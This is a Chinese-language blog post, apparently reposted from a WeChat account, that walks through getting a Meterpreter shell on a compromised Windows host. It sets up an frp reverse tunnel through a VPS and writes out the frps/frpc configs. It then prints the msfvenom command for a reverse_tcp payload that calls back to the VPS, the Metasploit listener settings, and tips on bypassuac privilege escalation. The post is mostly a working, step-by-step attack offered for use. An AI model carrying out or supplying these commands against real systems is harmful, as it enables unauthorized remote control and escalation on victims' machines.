frp反向代理+MSF获取shell

admin 2022年3月7日23:50:51评论165 views字数 1011阅读3分22秒阅读模式

0x00:简介

    frp 是一个反向代理工具.可以轻松地进行内网穿透.对外网提供服务,frp支持 tcp协议, http协议, https 等协议类型,并且 web 服务支持根据域名进行路由转发.

0x01:环境交代

靶机:x.x.174.171(下面简称靶机)

kali:192.168.1.106(下面简称kali)

vps:x.x.193.94(下面简称vps)

    已在靶机中获取到webshell

0x02:开始反向

一、在vps中在下载frp并编辑frps.ini

vim frps.ini
#frp服务端与客户端连接端口,frps和frpc必须一致bind_port = 7000


frp反向代理+MSF获取shell

启动frps:./frps -c ./frps.ini

frp反向代理+MSF获取shell

二、在kali中在下载frp并编辑frpc.ini

vim frpc.ini
[common]server_addr = x.x.193.94server_port = 7000        #frpc工作端口,必须和上面frps保持一致
[msf]type = tcplocal_ip = 127.0.0.1local_port = 5555 #转发给本机的5555remote_port = 6000 #服务端用6000端口转发给本机

frp反向代理+MSF获取shell

 启动frpc:./frpc -c ./frpc.ini

 

frp反向代理+MSF获取shell

这里frp反向代理做完了,下面开始MSF马制作与设置监听.

三、MSF制作马

msfvenom -p windows/meterpreter/reverse_tcp lhost=x.x.193.94 lport=6000 -f exe x>i.exe

frp反向代理+MSF获取shell

这里注意一下:

lport的端口是你frpc.ini里面的remote_port = 6000端口

四、设置监听、执行msf马

frp反向代理+MSF获取shell

这里注意一下:

set lhost 127.0.0.1   #设置监听ip,必须和frpc中的local_ip 一致set lport 5555        #设置监听端口,与frpc中的local_port一致

到靶机去执行i.exe

frp反向代理+MSF获取shell

观察vps上的frp

frp反向代理+MSF获取shell

观察本地的kali

frp反向代理+MSF获取shell

已获取到shell

frp反向代理+MSF获取shell

frp反向代理+MSF获取shell

tips:内置模块Local Exploit Suggester.这个模块可以帮助我们识别系统存在哪些漏洞可以被利用,并且为我们提供最合适的exp,通过这个exp我们可以进一步提权.

本人最常用的bypassuac模块

exploit/windows/local/bypassuac

frp反向代理+MSF获取shell


本文始发于微信公众号(洛米唯熊):frp反向代理+MSF获取shell

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月7日23:50:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   frp反向代理+MSF获取shellhttp://cn-sec.com/archives/497097.html

发表评论

匿名网友 填写信息